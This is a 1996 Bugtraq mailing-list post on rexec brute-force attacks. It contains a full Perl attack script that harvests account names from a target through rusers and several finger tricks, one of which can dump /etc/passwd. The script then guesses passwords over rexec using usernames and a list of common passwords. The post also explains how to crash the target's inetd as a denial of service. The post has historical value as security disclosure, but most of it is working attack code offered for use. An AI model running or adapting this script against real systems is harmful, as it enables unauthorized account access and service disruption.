Bugtraq mailing list archives
rexec brute
From: mudge () l0pht com (bastard)
Date: Tue, 4 Jun 1996 15:32:34 -0400
-- *Hobbit* wrote --
Pop3 isn't the only thing with that problem. Stock rexec, for example, never
logs anything and is another good way to hammer on password guesses from the
outside. [See "rservice.c" to make this easier...] Several other daemons,
particularly the vendor-supplied variety, are similarly lame. That's
what tcp
wrappers and logdaemon are for..
_H*
-- End *Hobbit* --
Since *Hobbit* broached the topic...
shell, login, telnet, pop, imap, ftp, telnet, and just about anything
else that takes a username / password pair is succeptible to vanilla
brute force attacks.
Of course exec (rexecd) does probably the worst job of logging from the
bunch (none). So it's one of the favorites.
Here's one of the old files I had floating around that I did a couple years
back.
All you need to do to rexec.c is modify it to take the password on the
command line and away you go. This is program is easilly modified to handle
dictionaries, bang on other services like pop, login, etc.
I'd post the simple mod to rexec.c but if you can't figure it out then
you *really* should get out of the pool.
You might need to tweak the select() call to allow more time if you
find you are hosing inetd's. Or... comment the call out and you will
crash the inetd of the host you are scanning.
.mudge () l0pht com
PS Better yet... use netcat to do this as it's much cleaner.
-----begin rexec.pl------
#!/bin/perl
# I dislike perl so shut-up if it ain't nice and tight!
# this is the wrapper for the modified rexec program. The rexec
# program allows the password to be supplied on the command line for
# easier automation. This perl script gathers information from rusers
# and finger and attempts to hack these with information gathered and
# with standard defaults.
# mudge 12/94
$COMMAND = "echo SECURITY";
$PROGRAM = "./rexec";
$TARGET = $ARGV[0];
$i = 0;
die "Usage: $0 target\n" if @ARGV != 1;
@SCRATCH = ('daemon', 'uucp', 'bin', 'adm', 'sysadmin', 'nuucp', 'sync',
'user', 'guest', 'demo', 'test', 'public', 'help', 'field',
'system', 'operator', 'sys', 'tty', 'unix', 'who', 'learn',
'uuhost', '4DGifts', 'lp', 'tour', 'tutor');
@PASS = ('secret', 'love', 'sex', 'money', 'god', 'letmein', 'fred');
open (RUSERS, "rusers -l $TARGET | ");
# get information from rusers about the people logged in
while (<RUSERS>) {
($echo) = split;
push(@SCRATCH, $echo);
}
close (RUSERS);
open (FINGER, "finger \@$TARGET | ");
# get information from finger about people logged in
while (<FINGER>) {
($local) = split;
push(@SCRATCH, $local) if !($local =~ /ogin/) && !($local =~ /^\[/) &&
!($local =~ /^$/);
}
close (FINGER);
open (FINGER, "finger \@\@$TARGET | ");
# this works on older Ultrix systems... it'll show you all the entries
# in /etc/passwd
while (<FINGER>) {
($local) = split;
push(@SCRATCH, $local) if !($local =~ /ogin/) && !($local =~ /^\[/) &&
!($local =~ /^$/);
}
close (FINGER);
open (FINGER, "finger 9876543219876543219876543212345\@$TARGET | ");
# this shows a couple of extra accounts on some sun machines
while (<FINGER>) {
($local) = split;
push(@SCRATCH, $local) if !($local =~ /ogin/) && !($local =~ /^\[/) &&
!($local =~ /^$/);
}
close (FINGER);
# ugly section where we take the array made from rusers and get rid
# of multiple logins by the same person. xterm's etc...
@INORDER = sort @SCRATCH;
while (@INORDER) {
$local = shift(@INORDER);
if ($i == 0) {
push(@USER, $local);
$last = $local;
$i = $i + 1;
}
else {
if (!($local eq $last)) {
push(@USER, $local);
}
}
$last = $local;
}
# print "------------------\n";
# grep((print "$_\n"), @USER);
# try the users login name as their password
foreach $u (0 .. $#USER) {
print "Trying $USER[$u].......\n";
alarm 0;
alarm 10;
open (FOO, "$PROGRAM -l $USER[$u] -p $USER[$u] $TARGET $COMMAND | ");
while (<FOO>) {
if (/SECURITY/) {
print "\nWARNING Hacked $USER[$u] $USER[$u]\n";
}
}
close (FOO);
# if you don't take a short break, inetd will kill the service
# as it thinks it's looping... easy enough denial of service
# attack.
select(undef, undef, undef, 1.5);
}
foreach $u (0 .. $#USER) {
print "Trying $USER[$u].......\n";
foreach $p (0 .. $#PASS) {
alarm 0;
alarm 10;
open (FOO, "$PROGRAM -l $USER[$u] -p $PASS[$p] $TARGET $COMMAND | ");
while (<FOO>) {
if (/SECURITY/) {
print "\nWARNING Hacked $USER[$u] $PASS[$p]\n\n";
}
}
close (FOO);
# try to prevent the service from shutting down... as a failsafe,
# the alarm's will kick us out.
select(undef, undef, undef, 1.5);
}
}
alarm 0;
Current thread:
- Re: Not so much a bug as a warning of new brute force attack, (continued)
- Re: Not so much a bug as a warning of new brute force attack Brett L. Hawn (Jun 03)
- pop3 daemon with syslog logging Gunnar Ingvi Thorisson (Jun 03)
- Re: Not so much a bug as a warning of new brute force attack Alan Brown (Jun 03)
- Re: Not so much a bug as a warning of new brute force attack Brian Davidson (Jun 04)
- Re: Not so much a bug as a warning of new brute force attack Russell Street (Jun 04)
- Re: Not so much a bug as a warning of new brute force attack Joe Block (Jun 04)
- Re: Not so much a bug as a warning of new brute force attack Thayne Forbes (Jun 04)
- Re: Not so much a bug as a warning of new brute force attack Steve Chew (Jun 04)
- Re: Not so much a bug as a warning of new brute force attack Shaun Lowry (Jun 04)
- Re: Not so much a bug as a warning of new brute force attack Valdis.Kletnieks () vt edu (Jun 04)
- rexec brute bastard (Jun 04)
- Re: Not so much a bug as a warning of new brute force attack Brett L. Hawn (Jun 03)
- Selecting Good Passwords mdr () vodka sse att com (Jun 04)
- brute force *Hobbit* (Jun 04)
- Re: brute force Christopher Klaus (Jun 04)
- Re: brute force Tom Fitzgerald (Jun 05)
- Re: brute force Alan Brown (Jun 06)
- Re: Linux rlogin hole with libc 5.x Alan Brown (Jun 06)
- Re: Linux rlogin hole with libc 5.x Pablo Idiaquez (Jun 06)
- help TaeJin Hong (Jun 07)
- HP-UX B.10.01 vulnerability Aleph One (Jun 07)
- Strange changes - any ideas? Fred Cohen (Jun 08)